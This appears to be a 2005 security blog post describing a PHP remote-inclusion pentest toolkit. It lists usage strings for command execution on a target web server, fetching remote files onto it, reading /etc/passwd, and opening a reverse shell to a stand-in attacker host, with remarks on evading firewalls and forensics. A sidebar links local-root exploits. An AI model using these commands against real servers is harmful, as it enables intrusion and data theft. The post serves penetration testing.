.comment-link {margin-left:.6em;}
Xavier's Security Post
Monday, September 12, 2005
(r)emote (i)nclusion (t)ool(k)it is a small php script I put together in use for
some remote inclusion auditing I was assigned to do. Surely there are numerous
scripts out there for similar usage, but I found many of them were badly coded.
Or were just over-coded. I also never really got into PHP coding too much, so it
was a perfect oppurtunity to try it out. You can grab it here, and the following
reference of its functionalities:


1) "ft" (function test)
desc: a command execution test, using 5 different functions.
usage: ?&ptk.php?&ft=1
optional: append "&ftc=COMMAND" after the ft variable. replace COMMAND with
a command. the default command used is "id".

2) execute a command.
desc: execute a specific command.
usage: ?&meth=METHOD&ftc=COMMAND
replace "METHOD" with the methods listed below.

3) remotely download and save a file to local disk.
desc: the title says it best.
usage: ?&saveas=/tmp/test&grab=http://site.tld/path/file

4) src show
desc: in case the php dist has safemode enabled, you can then rely
on file reading.
usage: ?&src=/etc/passwd

5) phpinfo
desc: sometimes you need to know some configuration details, and
phpinfo() suits that need.
usage: ?&pinfo=1

6) reverse shell
desc: on servers with php sockets enabled, you can utilize this feature to
possibly bypass any firewalls with strict incoming filters. this reverse
shell function is also cool because the php script is being executed
remotely, and thus no data is saved to the target's disk. thus forensic
investigations wouldn't be so useful in disclosing the reverse shell source.
but don't forget the http logs involved, duh.
usage: ?&rvs=1&rvsto=attacker.host.tld&rvsp=port-number

execution methods:
1) system()
2) exec()
3) passthru()
4) shell_exec()
5) popen()

there is much more to go.. :)
Comments: Post a Comment

Links to this post:

Create a Link

<< Home
This public blog will be a place for me to output any Security findings, both technological and physical, that I have come about. I will post Security advisories I was apart of, and also other interesting bits of knowledge. email: xavier [at] tigerteam.se

Rocks Clusters <=4.1 mount-loop local root
Rocks Clusters <=4.1 umount-loop local root
TSEAD-200606-6 - Rocks Clusters <=4.1 local root
xorgmodroot.py - Xorg-server 1.0 / <=X11R6.9.0-7.0 local root
TSEAD-200509-5 - Multiple Netscape.com vulnerabilities.
TSEAD-200512-3 - Multiple vulnerabilities in KISBG <=v5.1.1
fsigk_exp.py - FSIGK for Linux <=2.10-431 local root
TSEAD-200510-4 - FSIGK for Linux <=2.10-431 advisory
ritk.php - remote inclusion pentest tool
owm_exp.py - openwebmail <=2.51+ local root
perliodebug_exp.py - perlIO_debug 5.8.* local root
bankfix.py - bank card number lookup tool
TSEAD-200412-2 - AOL XSS/file read vuln
TSEAD-200412-1 - AOL redir vuln

September 2005 / October 2005 / November 2005 / December 2005 / March 2006 / April 2006 / May 2006 / June 2006 / July 2006 / September 2006 / October 2006 /